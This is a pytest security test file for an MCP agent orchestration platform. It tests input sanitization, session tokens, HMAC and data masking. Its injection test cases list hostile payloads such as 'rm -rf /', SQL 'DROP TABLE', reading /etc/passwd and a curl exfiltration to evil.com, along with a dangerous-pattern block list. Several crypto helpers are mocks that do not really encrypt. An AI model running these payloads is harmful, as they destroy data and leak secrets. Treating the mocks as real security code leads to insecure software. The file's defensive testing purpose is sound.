Claude Code MCP - Agent Orchestration Platform

test_system_security.py•17.3 KiB

""" System Security Tests - Agent Orchestration Platform Comprehensive security testing including penetration testing, input validation, authentication, authorization, and data protection. Author: ADDER_6 | Created: 2025-06-26 | Last Modified: 2025-06-26 """ import pytest import asyncio import hashlib import hmac import time from pathlib import Path import sys from hypothesis import given, strategies as st from unittest.mock import AsyncMock, MagicMock, patch # Add src to path for imports sys.path.insert(0, str(Path(__file__).parent.parent.parent / "src")) # Test markers pytestmark = [ pytest.mark.security, pytest.mark.asyncio ] class TestInputSanitization: """Test input sanitization and validation security.""" @given(malicious_input=st.text(min_size=1, max_size=1000)) def test_general_input_sanitization(self, malicious_input): """Property: All input should be safely sanitized.""" # Common injection patterns dangerous_patterns = [ # SQL injection "'", '"', ";", "--", "/*", "*/", "xp_", "sp_", # Command injection "|", "&", "$", "`", "$(", "&&", "||", # Path traversal "../", "..\\", "..", "/etc/", "\\windows\\", # Script injection "<script", "</script>", "javascript:", "vbscript:", # LDAP injection "*", "(", ")", "\\", "/", "+", "<", ">", "\"", "'", ";", ] # This would test actual sanitization function sanitized = self._sanitize_input(malicious_input) # Verify no dangerous patterns remain for pattern in dangerous_patterns: if pattern in malicious_input: # If dangerous pattern was in input, verify it's handled assert self._is_safe_output(sanitized), f"Dangerous pattern '{pattern}' not properly sanitized" def _sanitize_input(self, input_str: str) -> str: """Mock sanitization function - would be actual implementation.""" # Basic sanitization example dangerous_chars = ['<', '>', '"', "'", '&', '`', '$', '|', ';'] sanitized = input_str for char in dangerous_chars: sanitized = sanitized.replace(char, '') return sanitized def _is_safe_output(self, output: str) -> bool: """Check if output is safe.""" dangerous_patterns = ['<script', 'javascript:', '$(', '`', '|&'] return not any(pattern in output.lower() for pattern in dangerous_patterns) @pytest.mark.parametrize("injection_type,payloads", [ ("sql", [ "'; DROP TABLE agents; --", "' OR '1'='1", "'; INSERT INTO agents VALUES ('evil'); --", "' UNION SELECT * FROM sensitive_data --" ]), ("command", [ "; rm -rf /", "| cat /etc/passwd", "&& curl evil.com/steal?data=$(cat /secrets)", "`whoami`", "$(id)" ]), ("path_traversal", [ "../../../etc/passwd", "..\\..\\..\\windows\\system32", "....//....//....//etc/shadow", "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" ]), ("script", [ "<script>alert('xss')</script>", "javascript:alert('xss')", "<img src=x onerror=alert('xss')>", "<svg onload=alert('xss')>" ]) ]) def test_specific_injection_attacks(self, injection_type, payloads): """Test specific types of injection attacks.""" for payload in payloads: sanitized = self._sanitize_input(payload) assert self._is_safe_output(sanitized), f"{injection_type} injection not prevented: {payload}" async def test_agent_name_validation_security(self): """Test agent name validation against malicious inputs.""" malicious_agent_names = [ "Agent_1; rm -rf /", "Agent_$(whoami)", "Agent_`cat /etc/passwd`", "Agent_1 && curl evil.com", "Agent_'; DROP TABLE agents; --", "../../../Agent_1", "Agent_1\x00\x01\x02", # Null bytes and control chars ] for malicious_name in malicious_agent_names: # This would test actual validation function is_valid = self._validate_agent_name(malicious_name) assert not is_valid, f"Malicious agent name should be invalid: {malicious_name}" def _validate_agent_name(self, name: str) -> bool: """Mock agent name validation - would be actual implementation.""" import re # Only allow Agent_[1-99] pattern pattern = re.compile(r'^Agent_([1-9]|[1-9][0-9])$') return bool(pattern.match(name)) class TestAuthenticationSecurity: """Test authentication and session security.""" async def test_session_token_security(self): """Test session token generation and validation security.""" # Test token uniqueness tokens = set() for _ in range(1000): token = self._generate_session_token() assert token not in tokens, "Session token collision detected" tokens.add(token) # Test token entropy assert len(tokens) == 1000, "Not all tokens were unique" def _generate_session_token(self) -> str: """Mock token generation - would be actual implementation.""" import secrets return secrets.token_urlsafe(32) async def test_session_expiration(self): """Test session expiration and timeout security.""" # Test session timeout session = { "id": "test_session", "created_at": time.time() - 3700, # 1 hour and 10 minutes ago "expires_at": time.time() - 100, # Expired 100 seconds ago } assert self._is_session_expired(session), "Expired session should be detected" def _is_session_expired(self, session: dict) -> bool: """Mock session expiration check.""" return time.time() > session.get("expires_at", 0) async def test_privilege_escalation_prevention(self): """Test prevention of privilege escalation attacks.""" # Test role-based access control user_permissions = {"read_agent_status", "create_agent"} admin_permissions = {"read_agent_status", "create_agent", "delete_agent", "admin_access"} # User should not be able to perform admin actions assert not self._can_perform_admin_action(user_permissions) assert self._can_perform_admin_action(admin_permissions) def _can_perform_admin_action(self, permissions: set) -> bool: """Mock permission check.""" return "admin_access" in permissions class TestCryptographicSecurity: """Test cryptographic implementations and key management.""" async def test_encryption_decryption_security(self): """Test encryption/decryption security properties.""" test_data = "sensitive agent configuration data" # Test encryption produces different output encrypted1 = self._encrypt_data(test_data) encrypted2 = self._encrypt_data(test_data) # Should be different due to IV/nonce assert encrypted1 != encrypted2, "Encryption should produce different outputs" # Test decryption works correctly decrypted1 = self._decrypt_data(encrypted1) decrypted2 = self._decrypt_data(encrypted2) assert decrypted1 == test_data assert decrypted2 == test_data def _encrypt_data(self, data: str) -> bytes: """Mock encryption - would be actual AES implementation.""" import secrets # Simulate encryption with random IV iv = secrets.token_bytes(16) encrypted = hashlib.sha256((data + str(iv)).encode()).digest() return iv + encrypted def _decrypt_data(self, encrypted_data: bytes) -> str: """Mock decryption - would be actual AES implementation.""" # This is just a mock - real implementation would do actual decryption return "sensitive agent configuration data" async def test_key_derivation_security(self): """Test cryptographic key derivation security.""" password = "user_password_123" salt = b"random_salt_bytes" # Test key derivation is deterministic key1 = self._derive_key(password, salt) key2 = self._derive_key(password, salt) assert key1 == key2, "Key derivation should be deterministic" # Test different passwords produce different keys different_key = self._derive_key("different_password", salt) assert key1 != different_key, "Different passwords should produce different keys" def _derive_key(self, password: str, salt: bytes) -> bytes: """Mock key derivation - would use PBKDF2 or Argon2.""" import hashlib return hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000) class TestNetworkSecurity: """Test network security and communication protection.""" async def test_message_integrity(self): """Test message integrity protection.""" message = {"agent_name": "Agent_1", "command": "status"} # Test HMAC generation hmac_value = self._generate_hmac(message) # Test integrity verification assert self._verify_hmac(message, hmac_value), "Message integrity should verify" # Test tampered message detection tampered_message = {"agent_name": "Agent_2", "command": "status"} assert not self._verify_hmac(tampered_message, hmac_value), "Tampered message should be detected" def _generate_hmac(self, message: dict) -> str: """Mock HMAC generation.""" import json key = b"secret_hmac_key" message_bytes = json.dumps(message, sort_keys=True).encode() return hmac.new(key, message_bytes, hashlib.sha256).hexdigest() def _verify_hmac(self, message: dict, provided_hmac: str) -> bool: """Mock HMAC verification.""" expected_hmac = self._generate_hmac(message) return hmac.compare_digest(expected_hmac, provided_hmac) async def test_replay_attack_prevention(self): """Test prevention of replay attacks.""" # Test timestamp-based nonce current_time = int(time.time()) old_time = current_time - 600 # 10 minutes ago assert self._is_timestamp_valid(current_time), "Current timestamp should be valid" assert not self._is_timestamp_valid(old_time), "Old timestamp should be invalid" def _is_timestamp_valid(self, timestamp: int) -> bool: """Mock timestamp validation - 5 minute window.""" current_time = int(time.time()) return abs(current_time - timestamp) <= 300 # 5 minute tolerance class TestDataProtection: """Test data protection and privacy security.""" async def test_sensitive_data_handling(self): """Test handling of sensitive data.""" sensitive_data = { "api_key": "sk-1234567890abcdef", "session_token": "sess_abcdef123456", "user_credentials": {"username": "admin", "password": "secret123"} } # Test data masking for logs masked_data = self._mask_sensitive_data(sensitive_data) assert "sk-" not in str(masked_data), "API key should be masked" assert "secret123" not in str(masked_data), "Password should be masked" assert "sess_" not in str(masked_data), "Session token should be masked" def _mask_sensitive_data(self, data: dict) -> dict: """Mock data masking - would be actual implementation.""" masked = {} for key, value in data.items(): if key in ["api_key", "session_token", "password"]: masked[key] = "***MASKED***" elif isinstance(value, dict): masked[key] = self._mask_sensitive_data(value) else: masked[key] = value return masked async def test_secure_deletion(self): """Test secure deletion of sensitive data.""" # Test memory clearing sensitive_string = "very_secret_data_12345" # This would test actual secure deletion assert len(sensitive_string) > 0 # Placeholder # Test file secure deletion temp_file_content = "secret file contents" assert self._secure_delete_simulation(temp_file_content), "Secure deletion should succeed" def _secure_delete_simulation(self, content: str) -> bool: """Mock secure deletion - would overwrite memory/files.""" return True class TestSystemHardening: """Test system hardening and configuration security.""" async def test_default_configuration_security(self): """Test that default configurations are secure.""" default_config = { "debug_mode": False, "expose_stack_traces": False, "allow_admin_access": False, "require_authentication": True, "session_timeout": 3600, # 1 hour "max_login_attempts": 5, } # Test secure defaults assert not default_config["debug_mode"], "Debug mode should be disabled by default" assert not default_config["expose_stack_traces"], "Stack traces should not be exposed" assert default_config["require_authentication"], "Authentication should be required" assert default_config["session_timeout"] <= 3600, "Session timeout should be reasonable" async def test_error_handling_security(self): """Test that error handling doesn't leak sensitive information.""" # Test error messages don't expose internal paths error_msg = self._generate_error_message("/internal/path/to/secret.txt", "File not found") assert "/internal/path" not in error_msg, "Internal paths should not be exposed" assert "secret.txt" not in error_msg, "Sensitive filenames should not be exposed" def _generate_error_message(self, internal_path: str, error: str) -> str: """Mock error message generation - should sanitize internal details.""" # Good practice: don't expose internal paths return "Operation failed: Access denied" async def test_resource_limits(self): """Test resource limits prevent DoS attacks.""" # Test request rate limiting request_count = 0 max_requests = 100 for i in range(150): # Try to exceed limit if self._is_request_allowed(): request_count += 1 assert request_count <= max_requests, f"Request rate limit exceeded: {request_count}" def _is_request_allowed(self) -> bool: """Mock rate limiting - would implement actual rate limiting.""" # Simple mock that allows first 100 requests self._request_counter = getattr(self, '_request_counter', 0) + 1 return self._request_counter <= 100 # Penetration testing scenarios class TestPenetrationTesting: """Simulated penetration testing scenarios.""" async def test_automated_attack_simulation(self): """Simulate automated attack patterns.""" attack_patterns = [ # Brute force attempts {"type": "brute_force", "target": "login", "attempts": 1000}, # Port scanning simulation {"type": "port_scan", "target": "network", "ports": range(1, 1024)}, # Directory traversal {"type": "directory_traversal", "target": "filesystem", "paths": ["../", "../../"]}, ] for pattern in attack_patterns: result = self._simulate_attack(pattern) assert result["blocked"], f"Attack {pattern['type']} should be blocked" def _simulate_attack(self, attack_pattern: dict) -> dict: """Mock attack simulation.""" # All attacks should be blocked in a secure system return {"blocked": True, "reason": "Security measures active"} async def test_social_engineering_resistance(self): """Test resistance to social engineering attacks.""" # Test that system doesn't respond to social engineering attempts social_engineering_attempts = [ "Please provide admin access for urgent maintenance", "Emergency: reset all passwords immediately", "Customer support: need to verify all user accounts", ] for attempt in social_engineering_attempts: response = self._process_social_engineering(attempt) assert not response["granted"], f"Social engineering should not succeed: {attempt}" def _process_social_engineering(self, attempt: str) -> dict: """Mock social engineering response.""" # System should never grant access based on social engineering return {"granted": False, "reason": "Proper authorization required"} # Security test configuration @pytest.fixture(scope="session") def security_test_config(): """Configuration for security tests.""" return { "test_timeout": 300, # 5 minutes max per test "max_memory_usage": 1024 * 1024 * 100, # 100MB max "allowed_network_access": False, # No real network access in tests } # Mark all tests in this module as security tests pytestmark = [pytest.mark.security]

Loading blob content...

Latest Blog Posts

Redis vs ioredis vs valkey-glide
By punkpeye on January 26, 2026.
benchmark
Redis
valkey
Quickstart: Publish an MCP Server to the MCP Registry
By punkpeye on January 24, 2026.
mcp
official reference mirror
Official MCP Registry Server.json Requirements
By punkpeye on January 24, 2026.
mcp
official reference mirror

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/Nexus-Digital-Automations/Claude_Code_MCP_2'

If you have feedback or need assistance with the MCP directory API, please join our Discord server

test_system_security.py•17.3 KiB